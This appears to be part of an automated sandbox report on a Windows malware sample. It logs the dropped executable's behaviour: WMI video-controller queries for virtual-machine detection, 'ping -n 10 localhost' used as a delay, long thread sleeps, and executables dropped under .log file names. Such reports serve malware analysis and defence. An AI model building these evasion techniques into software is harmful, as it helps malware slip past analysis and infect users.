Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\chcp.com	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Memory allocated: BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Memory allocated: 1A760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1A950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1AA90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1B0C0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: BE0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1A730000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1B520000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 2420000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1A630000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 24D0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1A550000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 2E40000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1AEE0000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1650000 memory reserve \| memory write watch
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch

Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Code function: 20_2_00007FFD9C251A79 sldt word ptr [eax]

20_2_00007FFD9C251A79

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UHOiAYcz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EcmNwYns.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MitCbspL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bwSQzEwi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jhXaeGlG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\itiylxdQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dTEysZYC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sZJgMJEc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AnBXspYe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\npkPtdTK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bzhjaotg.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bBmjeBfL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YAYBVQfz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cBFZJSYc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IEuUpfEB.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XEBuDdCj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QNHtupkd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IhuDGjiQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ohOpBzSD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ihTQsugx.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YGvPWYoG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eAktcfLt.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MEDBuDSi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DeVdhSGw.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VCjBMLrF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QeOLILef.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KBRTYUOn.log	Jump to dropped file
